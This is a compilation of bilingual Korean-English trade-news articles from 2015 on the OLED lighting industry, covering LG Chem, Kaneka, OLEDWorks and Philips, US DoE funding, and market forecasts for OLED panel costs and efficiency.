추가적으로 DoE는 이번 년도 초에 SBIR(Small Business Innovation Research)-STTR Grants를 통하여, 4개의 OLED 조명 프로젝트를 선정하였다. OLEDWorks와 MicroContinuum, Pixelligent Technologies의 연구이며 모두 약 US$2.25 Million를 지원받았다. DoE는 OLED 조명에 관련된 프로젝트로 2015년에 모두 약 US$ 6 Million를 투자하였으며, 이는 2014년보다 US$1.6 Million 증가된 금액이다.

2015 DoE Funded OLED Lighting Projects

By DaRae Kim, reporter@olednet.co.kr

100x100mm OLED Lighting Panel Production Cost, US$ 2.5 Also Possible

As environmental issues are becoming a global concern, countries around the world are introducing environmental policies. Lighting occupies approximately 1,900,000,000 tonnes of global annual carbon dioxide emissions, and is becoming a big environmental regulation issue. Also as it takes up 25% of global power consumption it is an important area for energy reduction. Restriction regarding incandescent light, which used to be the main lighting, started and with active regulation on fluorescent light expected to begin, next generation lighting market is forecast to grow considerably.

At present, LED is in spotlight as the next generation lighting, rapidly expanding the market with its high efficiency and lifetime, replacing incandescent and fluorescent light. OLED does not contain harmful materials or light, and as lighting with high energy efficiency, it is receiving much attention as the most suitable next generation light for environmental and energy reducing policies. However, due to the steep price compared to LED, the market is growing more slowly than estimated.

According to UBI Research’s OLED Lighting Annual Report, published today (14th May), if 100mmx100mm is mass produced using equipment size of 1270mmx1270mm, OLED lighting panel production cost is analyzed to fall to US$ 5 or lower from 3rd year of mass production, and US$ 2.5 from 10th year (when 1 min tack time/single stack). This price is higher than US$ 1 – 3 of incandescent and fluorescent lights but much lower than approximately US$ 10 of LED lamp for interior lighting (60~70lm/W). Additionally, OLED lighting panel is currently being mass produced with superior efficiency and lifetime compared to incandescent and fluorescent lighting, and being developed with efficiency equal to LED. Considering these factors, if active mass production investments by OLED lighting panel companies take place, the market share within the lighting sector is estimated to rapidly increase.

OLED Lighting Annual Report forecast that in the early stages of mass production OLED lighting will form market focusing on areas where OLED lighting’s merits can be utilized in areas such as automotive, medical use, cosmetics, and exhibitions and not through main lighting. However, once mass production competitiveness is achieved, it is expected to quickly expand in main lighting market. Additionally, lighting market with high added value could be created through differentiation using flexible and transparent, and forecast the market to grow to show US$ 2,800,000,000 by 2020, and occupy approximately 10% of the total lighting market.graph

100x100mm OLED lighting panel원가, US$ 2.5 도 가능하다.

세계적으로 환경문제가 대두됨에 따라 세계 각국에서 친환경 정책을 도입하고 있다. 조명은 세계 연간 이산화 탄소 배출량 중 약 19억톤을 차지하며 환경규제의 큰 이슈로 부각되고 있다. 또한 세계 전력소모 중 25%를 소비하고 있어 에너지 절감에도 필요한 중요한 분야이다. 이에 따라 기존의 메인 조명이었던 백열등에 대한 규제가 시작되었으며, 형광등도 본격적인 규제가 예상되어 차세대 조명 시장이 크게 성장할 전망이다.

차세대 조명으로서 각광받고 있는 LED는 고효율과 긴 수명을 장점으로 백열등과 형광등을 대체해가며 빠르게 시장을 넓혀가고 있다. OLED조명은 유해한 물질과 빛이 없고 높은 에너지 효율을 가진 조명으로써 친환경, 에너지절약 정책에 가장 적합한 차세대 조명으로 관심을 받고 있지만 LED 대비 높은 가격으로 예상보다 시장 성장이 늦어지고 있다.

유비산업리서치가 14일 발간한 “OLED Lighting Annual Report”에서는 1270×1270 size의 장비에서 100x100mm을 양산할 경우 양산 3년차부터 OLED lighting panel의 원가가 US$ 5 이하로 떨어지며, 10년차에는 US$ 2.5까지 내려가는 것으로 분석했다. (1분 tact time / single stack 가정) 현재 백열등과 형광등이 US$ 1~3 보다는 비싼 가격이지만, 실내조명용 LED 전구(60~70lm/W) 약 US$ 10 보다는 훨씬 저렴한 가격이다. 또한 현재 OLED lighting panel은 백열등과 형광등보다 우수한 효율과 수명으로 양산되고 있고 LED와 대등한 수준의 효율로 개발되고 있다. 이러한 점들을 감안하고 OLED lighting panel업체들의 본격적인 양산투자가 이루어 진다면 조명시장에서 빠른 속도로 점유율이 증가할 것으로 예상된다.

“OLED Lighting Annual Report”에는 OLED lighting panel 양산 초기에는 자동차용이나 의료용, cosmetic용, 전시용 등 주조명이 아닌 OLED lighting의 장점을 활용할 수 있는 분야 위주로 시장을 형성할 것으로 예상되나 원가경쟁력을 갖춘 후에는 빠른 속도로 광원 시장에서의 점유율을 넓혀갈 것으로 예상했다. 또한 flexible이나 transparent등 OLED lighting이 가질 수 있는 특성들을 이용한 차별화된 제품을 통해 고부가가치의 광원 시장을 창출할 수 있을 것으로 내다 보았다. 이에 따라 전체 광원 시장에서 OLED ligthig panel 시장은 2020년에 US$ 2,800 million 규모로 성장하여 전체 광원시장의 약 10%를 차지할 수 있을 것으로 전망했다.

 

 

OLEDWorks to Acquire Parts of Philips’ OLED Business

Philips and OLEDWorks signed an agreement that is expected to have significant effect on future direction for the OLED sector of the Philips. On April 28, OLEDWorks announced that they will acquire key parts of Philips’ OLED lighting business.

 

According to OLEDWork’s press release, Philips will establish a new legal entity and transfer key parts of its OLED business in the next few months. This will include the production facility in Aachen, Germany, and relevant intellectual property. All shares of the new entity will subsequently be sold to OLEDWorks. Once the new company has been established, OLEDWorks will be granted license by Philips to market its OLED light source components under the Philips brand. Philips will remain a distributor of the panels through OEM sales channels.

 

OLEDWorks CEO David DeJoy explained that this deal will broaden their mission to deliver high performance OLED light engine to a wide range of lighting applications. Eric Rondolat, CEO of Philips, added it “will enable [them] to focus [their] business and resources on developing innovative connected lighting systems and services for professional and consumer markets”.

 

OLEDWorks is based in Rochester, New York. Founded in 2010, OLEDWorks is the only US-based OLED light engine and panel manufacturer. Currently, OLEDWorks is producing 2 models of white OLED lighting panel samples in sizes of 43×101.6×3.2mm and 65x175x2.0mm. There are 2 kinds of color temperatures, 3,000K and 3,500K, with efficiency of 45lm/W, and lifetime of 10,000 hours or longer (LT70 @ 3,000 cd/m2).

OLEDWorks, Philips의 OLED사업부 인수 협약 체결.

Philips와 OLEDWorks는 Philips의 OLED 사업부의 미래를 결정하는 협정에 서명하였다. 4월 28일, OLEDWorks는 Philips의 OLED lighting 핵심 사업부를 인수했다고 발표했다.

OLEDWorks가 배포한 보도자료에 따르면, Philips는 조만간 새로운 법인을 설립할 예정이며 OLED 핵심 사업부를 새로운 법인으로 옮길 것이라고 전했다. 새로 설립될 법인은 독일 아헨에 있는 생산시설과 관련 지적 재산권까지 포함하며, 인수 협약 후 새로운 법인의 모든 지분은 OLEDWorks에서 매수할 예정이다. 새로운 법인이 설립되면 OLEDWorks는 Philips로부터 OLED lighting panel을 Philips의 브랜드 명으로 판매할 수 있는 권리를 얻게 되며, Philips도 OEM방식 판매를 통한 panel의 유통은 남겨둘 방침이다.

OLEDWorks의 CEO인 David DeJoy는 이번 협정을 통해 고성능의 OLED lighting engine을 넓은 범위의 lighting 응용제품에 확대하여 자사의 목표를 넓힐 수 있을 것이라고 설명하였다. Philips의 CEO인 Eric Rondolat는 인수에 대해서 자사의 역량을 전문가와 소비자 시장을 위한 innovative connected lighting systems and services 개발에 집중할 수 있게 되었다라고 덧붙였다.

OLEDWorks는 2010년에 설립되었으며, OLED lighting 기구와 panel 제조사들 중 미국에 본사를 가진 유일한 회사이다. 현재 43×101.6×3.2mm와 65x175x2.0mm size의 2가지 model의 white OLED lighting panel 샘플을 생산하고 있다. 3,000K와 3,500K 두가지 색온도가 있으며 효율은 45lm/W, 수명은 10,000시간 이상(LT70 @ 3,000 cd/m2)이다.

[Euroluce 2015] Kaneka Exhibits OLED Lighting Panel with 50 Thousand Hours of Lifetime

Marketing activities in Europe by Kaneka, one of Japan’s key OLED lighting panel companies, is attracting attention. Kaneka, the only company with active European marketing out of many OLED lighting companies in Japan, participated in Euroluce, a biennial event, in 2013 as well as 2015. Unlike most of Japanese OLED lighting companies whose promotion activities are focused on their domestic market, Kaneka is enthusiastic regarding lighting exhibition in Europe. This is analyzed to be because Kaneka is aiming for market expansion into Europe and North America, as well as Japan’s domestic market.

 

Kaneka explained that, “OLED lighting is suitable for European customers who consider design and diversity to be important as they have good energy efficiency, thin surface light source, soft light, and ability to produce various colors”, and revealed “increasing European consumers’ awareness of OLED lighting is the priority assignment and the main reason for this exhibition”.

 

In Euroluce 2015, Kaneka exhibited OLED lighting panel with 50 thousand hours of lifetime with 1.05mm thickness. They presented 5 colors of white, red, amber, blue, and green with 3 different panel sizes of 80x80mm, 100x100mm, and 143x23mm.

 

Kaneka possesses a manufacturing line that can produce 20,000 panels per year, and in past have announced their target of approx. 50 billion Yen in revenue by 2020.

 

Kaneka Booth, Euroluce 2015

Kaneka Booth, Euroluce 2015

[Euroluce 2015] Kaneka, 5만시간 수명의 OLED lighting panel 전시

일본의 주요 OLED lighting panel 업체 중 하나인 Kaneka의 유럽에 대한 마케팅 활동이 돋보이고 있다. 일본의 여러 OLED lighting 업체 중 유일하게 유럽 마케팅에 적극적인 업체로서 격년으로 개최되는 Euroluce에 2013년에 이어 2015년에도 부스를 열었다. Kaneka가 유럽 조명전시회에 적극적으로 나서는 이유는 대부분의 일본 OLED lighting 업체들이 내수시장 위주의 홍보활동을 하고 있는 반면, Kaneka는 일본 내수시장 뿐만 아니라 유럽과 북미로의 시장확대를 목표로 하고 있기 때문인 것으로 분석된다.

Kaneka 관계자는 “OLED lighting은 energy saving과 얇은 면광원, 부드러운 빛, 다양한 color 구현이 가능하다는 장점을 가지고 있어 디자인과 다양성을 중요시하는 유럽 고객들에게 적합하다.”라며, ”OLED lighting에 대한 유럽 고객들의 인지도를 높이는 것이 최우선 과제로 이번 전시회도 인지도를 높이는 것이 주 목적”이라고 밝혔다.

Kaneka는 이번 Euroluce 2015에서 5만시간 의 수명과 1.05mm의 얇은 두께를 가진 OLED lighting panel을 전시하였다. 색상은 white와 red, amber, blue, green 5종류이며 panel size는 80x80mm와 100x100mm, 143x23mm의 3종류이다.

Kaneka는 연간 20,000개의 panel을 생산할 수 있는 라인을 보유하고 있으며, 2020년까지 약 50billion엔(약 5천억원)의 매출 달성이 목표라 밝힌바 있다.

Kaneka의 부스, Euroluce 2015

 

[Euroluce 2015] Enter OLED Lighting Cheaper Than LED

An area has emerged where OLED lighting can exceed LED’s price competitiveness.

 

In LG Chem’s booth in Euroluce 2015 (April 14-19, 2015), a British company Mackwell’s OLED lighting applied emergency system was exhibited. Mackwell applied LG Chem’s OLED lighting panel to the emergency system used in cases of fire/blackout instead of existing LED lighting reducing the overall system installation cost. Mackwell is known to be preparing for commercialization.

 

LG Chem explained that “construction, excluding lighting, accounts for the 30-50% of total cost for interior lighting. LED lighting requires separate space for installation making construction cost a necessity, but as OLED lighting does not need additional construction this can be reduced. Although OLED lighting’s unit price is higher than LED’s, overall interior cost can be reduced if OLED lighting is used resulting in cheaper price”.

 

Regarding this, one LED expert observed that, “a certain distance is required between the LED lighting source and device, therefore LED installation space is additionally required and increases the cost” and “if the construction cost could be reduced from interior lighting it would be a great advantage”.

 

As shown, areas where merits of OLED lighting are actively used are emerging rapidly such as interior, medical, and vehicular lighting. If the cost competitiveness can be achieved from active investment by OLED lighting companies, not only the OLED lighting exclusive market could be created but existing lighting market could be replaced.

 

Mackwell’s Emergency Luminaire

Mackwell’s Emergency Luminaire

[Euroluce 2015] LED보다 저렴한 OLED lighting 등장

LED의 가격경쟁력을 OLED lighting이 넘어설 수 있는 영역이 나타났다.

지난 4월 14일부터 개최중인 Euroluce 2015에서 LG Chem.의 부스에 영국 Mackwell사의 OLED lighting이 적용된 비상등 system이 전시되었다.

Mackwell사는 화재나 정전 시 사용되는 비상등 system에 기존의 LED lighting 대신 LG Chem.의 OLED lighting panel을 적용시켜 전체적인 system 설치비용을 줄일 수 있었으며, 현재 상품화를 준비 중인 것으로 알려졌다.

LG Chem. 관계자는 ”조명 인테리어에서는 lighting 이외의 시공비가 전체비용의 30~50%를 차지하고 있다. LED lighting은 설치를 위한 별도의 공간이 필요하여 시공비가 필수적이지만 OLED lighting은 별도의 시공이 필요하지 않기 때문에 시공비용을 줄일 수 있다. 현재 OLED lighting panel의 단가가 LED 보다 비싸지만 전체적인 인테리어 비용에서는 시공비를 줄일 수 있는 OLED lighting을 사용하는 것이 더 저렴할 수 있다.” 라고 설명했다.

이와 관련하여 한 LED 업체 관계자는 “LED lighting source와 기구 사이에는 일정 거리가 반드시 필요하기 때문에 LED 설치를 위한 공간이 별도로 필요하며 여기에도 비용이 소모된다” 라며 “조명 인테리어에서 시공비를 줄일 수 있다면 큰 장점이 될 수 있을 것”이라고 언급했다.

이처럼 조명 인테리어와 의료용, 자동차용 lighting 등 OLED lighting의 장점을 적극적으로 활용할 수 있는 분야가 빠른 속도로 나타나고 있다. OLED lighting업체들의 본격적인 투자로 panel의 가격경쟁력을 확보하게 된다면 OLED lighting만의 새로운 시장 창출은 물론 기존 조명시장의 대체도 가능할 것으로 예상된다.

Mackwell 사의 Emergency Luminaire

 

[Euroluce 2015] LG Chem, Business Acceleration through Lighting Solution

In Euroluce 2015 (April 14-19, 2015) being held in Milan, Italy, LG Chem started enthusiastic European lighting market promotion with their largest booth of the exhibitions they have participated so far.

 

By showing the solution for OLED lighting and not an exhibition centering on existing panel and luminaire, LG Chem began active customer creation by supplying OLED panel, module and OLED lighting solution.

 

LG Chem revealed that “the supply is possible to B2C market through solution regarding OLED lighting, and not just to B2B market”, and that they will “strive to obtain more customers through providing various solutions”. Additionally, they emphasized the importance in new application and widening the scope as well as appealing lighting’s merits; “as most of the attendees are attracted toward the main exhibition, ‘Salone del Mobile Milano’ (Milan Furniture Fair), they showed much interest in transparent connection and rail connection that can diversely be applied to furniture and building”.

 

Examples of LG Chem’s Transparent Connection and Rail Connection Application

Examples of LG Chem’s Transparent Connection and Rail Connection Application

 

Furthermore, LG Chem exhibited LG panel applied products by partner companies such as Acuity, and Mackwell and introduced diverse areas where OLED lighting can be used.

 

In order to proceed with active OLED lighting investment, LG Chem is unfolding dynamic marketing to draw in customers. From February this year, LG Chem began selling DIY KIT OLED lighting module through Korean open market, and opened their first booth in Japan in Lighting Fair Japan 2015 which was held in March. In June, LG Chem is planning to open an OLED lighting exclusive exhibition in Nonhyeon-dong in Gangnam (Seoul, Korea) and intensify marketing.

 

LG Chem Booth, Euroluce 2015

LG Chem Booth, Euroluce 2015

[Euroluce 2015] LG Chem, OLED Lighting Solution 제공으로 사업 가속화

4월 14일부터 19일(현지시각)까지 이탈리아 밀라노에서 개최되는 Euroluce 2015에서 LG Chem이 지금까지 참여한 전시회중 가장 큰 규모의 부스를 열며 유럽 조명 시장에 대한 적극적인 홍보에 나섰다.

LG Chem.은 이번 전시회에서 기존의 panel과 등기구 위주의 전시가 아닌 OLED lighting에 대한 solution을 보여줌으로써 OLED panel과 모듈, OLED lighting solution 공급을 통해 본격적인 고객확보에 나섰다.

LG Chem. 관계자는 “OLED lighting에 대한 solution 제공을 통해 B2B 뿐만 아니라 B2C market으로도 공급 가능하며, 다양한 solution 제공을 통해 고객확보에 힘쓸 것” 이라 밝혔다. 또한 “특히 이번 전시회의 참관자 대부분이 메인 전시회인 “Salone del Mobile Milano(가구 건축 박람회)”에 포커싱을 하고 있는 만큼 가구와 건축물에 다양하게 적용할 수 있는 transparent connection과 rail connection에 대해 많은 관심을 보였다”며, OLED lighting의 장점을 어필하는 것도 중요하지만 새로운 application과 적용분야에 대한 개발의 중요성도 강조하였다.

이밖에 LG Chem.은 자사의 panel로 제작된 Acuity와 Mackwell 등의 partner사의 제품들을 전시하여 OLED lighting이 적용될 수 있는 다양한 장르를 소개하였다.

LG Chem.은 OLED lighting 투자를 본격적으로 진행하기 위한 첫걸음으로써 고객확보를 위한 적극적인 마케팅을 펼치고 있으며, 지난 2월부터 한국의 오픈마켓을 통하여 DIY KIT의 OLED lighting 모듈 판매를 시작하였으며 3월에는 Lighting Fair Japan 2015에서 처음으로 일본에 부스를 열었다. 또한 올 6월에는 강남 논현동에 OLED lighting 전용관을 오픈하여 OLED lighting에 대한 마케팅을 더욱 강화할 예정이다.

LG Chem의 transparent connection과 rail connection을 적용 예시

LG Chem., 일반 소비자의 OLED조명 경험을 위하여 DIY Kit 출시

LG Chem.에서는 2015년 2월 자연광과 가장 유사한 최고급 OLED조명을 일반 소비자가 직접 체험 가능하도록 OLED조명 DIY Kit를 국내 출시하였다.

OLED는 유기반도체로 이루어진 발광소자로서, 유기물질에 전류를 흘려주면 고유의 색으로 빛을 내며 TV, 조명 등에 사용되어 차세대 소자로 주목 받고 있다. 특히 OLED조명은 분광분포가 태양광과 가장 유사하여 마치 자연광 아래에 있는 듯한 안정감을 주고, 연색 지수가 높아 정확한 색상을 재현할 수 있다. 기존 광원과는 달리 만져도 뜨겁지 않고, 직접 쳐다봐도 눈이 부시지 않다. 자외선이 전혀 없는 인간친화적인 조명이며, 블루라이트가 타 광원대비 거의 나오지 않아, 시력보호에도 효과적인 광원이다. 얇고 가벼우며 유연한 특성을 가지고 있어 무한한 디자인의 가능성 또한 가지고 있다.

LG Chem.은 이러한 장점을 가지고 있는 OLED조명을 일반 소비자가 손쉽게 경험해 볼 수 있도록 최대한 심플한 구성품과 연결방법으로 이번 OLED DIY Kit를 준비하였다. Single Kit는 LG Chem.의 100x100mm OLED 모듈이 한 장 들어 있고, Double Kit는 모듈이 두 장 들어 있어 원하는 대로 선택 가능하며, DIY Kit에는 OLED패널(전구 역할), 스위치, 커넥터가 연결된 전선 세트가 포함되어 있어 커넥터를 두세번 연결하고, 마이크로 5핀 AC 어댑터 (일반 안드로이드 휴대폰 충전기와 호환 가능)를 연결하기만 하면 불이 켜지게 되어 있는 아주 쉽고 단순한 구조를 자랑한다. LG Chem.의 100x100mm 모듈은 패널의 두께가 0.88mm에 지나지 않아, 깔끔한 알루미늄 케이스를 포함하고도 두께가 2.2mm이다. 나무, 종이, 철사 등을 활용하거나 기존 제품 등을 리폼하여 모듈과 스위치를 부착하면 원하는 형태의 조명을 완성할 수 있다.

LG Chem.은 OLED조명의 친환경적인 면모를 잘 나타내기 위하여 과대 포장 재료와 화려한 색상 표현을 자제하고, 심플한 종이 박스로 제작하였다. Single Kit는 2.5W 미만, Double Kit는 5W 미만의 전력이 소모되는 초절전 조명으로 에너지 효율 또한 우수하다.

LG Chem.은 OLED조명 업계에서 필립스, 오스람 등을 능가하는 세계 최고 성능, 최대 사이즈, 최장 수명의 OLED조명 패널을 판매하고 있으며, 주요 재료 자체 생산 및 앞선 공정 기술로 가격 측면에서도 가장 경쟁력이 있다. 또한 고객이 원하는 부분을 반영하기 위하여, LG계열사 임직원을 대상으로 체험단을 운영함으로써 다양한 DIY 제작 아이디어를 수집하였고, 이번 출시된 DIY Kit는 체험단의 경험에서 나온 개선사항들을 반영하여 제작하였다

국내에는 현재 G market, 11번가 등 주요 인터넷 쇼핑몰에서 판매 중에 있으며, 4월부터는 일본과 중국, 그리고 5월부터는 유럽, 미국 등 해외 시장에서의 판매도 계획 중이다.

<LG Chem.의 DIY Kit 사용예시, 출처 : LG Chem.>

<LG Chem.의 DIY Kit 구성품과 연결방법, 출처 : LG Chem.>

[Lighting Fair Japan 2015] LG Chem, 100lm/W OLED Lighting Panel Mass Production Possible in April 2015

LG Chem estimates mass production of highly efficient 100lm/W OLED lighting panel in April this year. In Lighting Fair Japan 2015 (March 3 – 6) LG Chem announced that they have achieved 2014 target of 100lm/W development, and that mass production will be possible from April 2015. Additionally, they presented the 140ml/W roadmap until 2017, and LG Chem is forecast to keep on leading the OLED lighting market.

Until now OLED lighting had lower efficiency compared to the existing fluorescent light (approx. 100lm/W) and LED (approx. 100lm/W or higher), and was mostly used as luminaire rather than down light. However, if active mass production of 100lm/W products begins, utilization as down light will also be possible.

In this exhibition, LG Chem showcased solution concept of down light, and not a luminaire focused exhibition. They also demonstrated OLED lighting’s competitiveness as down light by securing lifetime of 40 thousand hours. This is approximately twice as long as fluorescent light and rivals LED. The biggest issue for OLED lighting is the cost. If the price becomes competitive through active investment, it is analyzed that the OLED lighting market will grow rapidly.

According to UBI Research’s OLED Lighting Annual Report 2014, OLED lighting market is forecast to grow by 100% of compound annual growth rate and form US$ 4,700 million market in 2020.

150309_ [Lighting Fair Japan 2015]LG Chem., 2015년 4월 100lmW의 OLED lighting panel 양산 가능3<LG Chem’s R&D Roadmap, Source : LG chem>

150309_ [Lighting Fair Japan 2015]LG Chem., 2015년 4월 100lmW의 OLED lighting panel 양산 가능2<Front View of LG Chem Booth, Lighting Fair Japan 2015>

By HyunJun Jang, reporter@olednet.co.kr

[Lighting Fair Japan 2015] LG Chem., 2015년 4월 100lm/W의 OLED lighting panel 양산 가능.

LG Chem.이 100lm/W의 고효율 OLED lighting panel양산이 올 4월 가능할 것으로 예상된다. 지난3월 3일부터 6일까지 열린 Lighting Fair Japan 2015에서 LG Chem.은 2014년 목표였던 100lm/W 개발을 완료하였으며 2015년 4월부터 양산이 가능하다고 밝혔다. 또한 2017년까지 140lm/W의 로드맵을 제시하며 OLED lighting 시장을 지속적으로 리드할 것으로 전망된다.

OLED lighting은 기존 조명인 형광등(약 100lm/W)과 LED(약 100lm/W이상)에 비해 낮은 효율로 주조명 보다는 등기구 위주의 제품들이 주를 이루었다. 하지만 100lm/w의 제품이 본격적으로 양산이 된다면 주조명으로도 본격적으로 적용될 수 있다.

이번 전시에서 LG Chem.은 기존의 등기구 위주의 전시가 아닌 주조명에 대한 솔루션 컨셉의 전시를 하였으며, 형광등보다 2배가량 길고 LED와도 경쟁 가능한 수준인 4만시간의 수명 확보로 OLED lighting이 주조명으로도 충분히 경쟁력이 있다는 것을 보여주었다. OLED lighting의 가장 큰 해결 과제는 가격이다. 본격적인 투자가 진행되어 가격 경쟁력만 갖춘다면 OLED lighting 시장 규모는 급격히 성장 할 것으로 분석된다.

유비리서치에서 발간한 OLED lighting Annual Report 2014에 따르면 OLEDLighting 시장은 연평균 성장률 100%로서 2020년에 US$ 4,700million 시장을 형성할 것으로 전망했다.

<LG Chem.의 R&D 로드맵, 출처 : LG화학>

<LG Chem. 부스 전경, Lighting Fair Japan 2015>

By HyunJun Jang, reporter@olednet.co.kr

[Lighting Fair Japan 2015] LG Chem. Begins Intense OLED lighting Marketing in Korea and Japan, Following Europe

In order to actively open LG Chem’s OLED lighting market, they began intense marketing in Korea and Japan, following Europe. Formerly, OLED lighting marketing took place centering on Europe’s high-end luminaire market. However, LG Chem opened their first booth in Japan in Lighting Fair Japan 2015, and showed how easily OLED lighting can be applied in everyday life by exhibiting solution for down light rather than focusing on luminaire. LG Chem revealed their anticipation for Japan’s OLED lighting market’s growth explaining, “Japan’s conversion rate to area lighting is increasing rapidly and it is estimated the demand for OLED lighting will increase.”

150306_[Lighting Fair Japan 2015]LG Chem., 유럽에 이어 한국과 일본에 본격적인 OLED lighting 마케팅 시작<Front View of LG Chem Booth, Lighting Fair Japan 2015>

LG Chem also began their marketing in Korea for the public. Average consumers were able to come in contact with OLED lighting easily as OLED lighting DIY Kit and table lamp “FRAME” appeared on the open market. Particularly, OLED lighting DIY Kit provided 100x100mm OLED lighting panel, wire, and switch that can control the light (30/60/100lm), and allowed the public to apply the kit for various uses. Currently OLD lighting DIY Kit is being sold for approx. US$ 86, and OLED table lamp “FRAME” for approx. US$ 254. However, when LG Chem’s active investment and mass production begin, the price is expected to fall further.

 LG Chem’s OLED table lamp “FRAME” and OLED DIY KIT Being Sold in Korea’s Open Market

LG Chem’s OLED table lamp “FRAME” and OLED DIY KIT Being Sold in Korea’s Open Market

 <LG Chem’s OLED table lamp “FRAME” and OLED DIY KIT Being Sold in Korea’s Open Market>

Example of OLED DIY KIT Use, Lighting Fair 2015

Example of OLED DIY KIT Use, Lighting Fair 2015

<Example of OLED DIY KIT Use, Lighting Fair 2015>

By HyunJun Jang, reporter@olednet.co.kr

[Lighting Fair Japan 2015] LG Chem., 유럽에 이어 한국과 일본에 본격적인 OLED lighting 마케팅 시작

LG Chem.의 OLED lighting시장을 본격적으로 열기 위해 유럽에 이어 한국과 일본에 본격적으로 홍보를 시작했다. 기존에는 유럽의 high-end 조명 등기구 시장을 중심으로 OLED lighting에 대한 마케팅을 펼쳤었다. 하지만 Lighting Fair Japan 2015에서 최초로 일본에서 부스를 열었으며, 기존의 등기구 위주의 전시가 아닌 주 조명(down light)에 대한 솔루션을 전시하며 일상생활에서도 쉽게 OLED lighting이 적용될 수 있다는 것을 보여주었다. LG Chem. 관계자는 “일본에서의 면 조명 전환률이 급속도로 높아지고 있는 추세여서 OLED lighting에 대한 수요가 많아질 것으로 예상된다.” 라며 일본의 OLED lighting 시장의 성장성에 대해 기대감을 밝혔다.

 <LG Chem.의 부스 전경, Lighting Fair Japan 2015>

LG Chem.은 한국에서도 일반 소비자들에게 OLED lighting에 대한 마케팅도 본격적으로 시작하였다. 오픈마켓을 통하여 OLED lighting DIY Kit과 table lamp “FRAME”을 판매함으로써 일반 소비자들이 쉽게 OLED lighting을 접할 수 있게 하였다. 특히 OLED lighting DIY Kit은 100x100mm의 OLED lighting panel과 전선, 30/60/100lm 으로 조절할 수 있는 스위치를 제공하여 일반 소비자들이 다양한 분야에 활용할 수 있도록 하였다. 현재 OLED lighting DIY Kit은 95,000원, OLED table lamp “FRAME”은 280,000원에 판매되고 있지만 LG Chem.의 본격적인 투자와 양산이 시작되면 가격은 더욱 떨어질 전망이다.

 

 <LG Chem.이 한국의 오픈마켓을 통해 판매중인 OLED table lamp “FRAME”와 OLED DIY KIT>

<OLED DIY KIT의 사용 예시, Lighting Fair 2015>

By HyunJun Jang, reporter@olednet.co.kr

LG화학, 320x320mm OLED lighting과 새로운 new application을 출시

LG화학의 320x320mm OLED lighting 패널은 세계에서 판매되는 제품 중 가장 큰 패널이다. 이 패널은 60lm/W의 효율과 높은 CRI (90), 그리고 0.88mm의 두께를 가지고 있다. 출력은 보통 60~75와트의 백열등과 비슷하다.

이는 OLEDs가 에너지 효율적이고 인간 친화적인 조명 재료가 될 것으로 예상될 뿐만 아니라 활용하고자 하는 목적에 따라 다용도로 쓰일 수 있는 조명으로 사용될 수 있음을 확실하게 보여주고 있다.

현재 320x320mm 패널은 구매가 가능하다.

LG화학은 자기연결 방식으로 OLED panel을 쉽게 설치할 수 있는 두 가지 타입의 “Mounting Solutions”를 개발했다.

 

Rail connection

 Rail connection은 각각 마감 처리되어 있는 200x50mm 패널과 통합된 DC-DC driver로 구성되어 있다.

AC-DC driver가 DC를 conductor rail에 공급하면 rail에 전원이 공급되어 각각의 lighting 패널은 rail에 붙는다.

또한 Linear Connection Solution은 크롬으로 마감 처리한 200x50mm OLED panels이 사용된다. 각각의 lighting 패널은 자기적으로 다른 패널에 연속적으로 연결되며 그 패널들은 다시 금속표면에 붙는다.

패널들 사이에 거리가 필요하면 extension bar를 사이에 놓으면 된다.

Mounting solutions은 소매상의 선반에서부터 일반적인 가정용 가구에 이르기까지 쉽게 어디에나 적용될 수 있다.

 

 

Linear Connection

Transparent Electrode는 320x110mm OLED panels를 이용한다.

투명한 mesh conductive film과 OLED 패널, 보호장치는 한 장의 glass기판에 합착된다. 이로써 OLED는 전선 없이도 패널에 연결하여 빛을 낼 수 있다 그러므로 공중에 떠 있는 효과를 얻을 수 있는 것이다.

Transparent Electrode는 음식이나 화장품과 같은 온도에 민감한 제품을 선반 위에 진열하고 판매하는 소매상에 아주 적절할 것이다.

다양한 모양과 크기의 OLED는 다양한 디자인으로 만들어질 수 있을 것이다.

 

Portfolio Items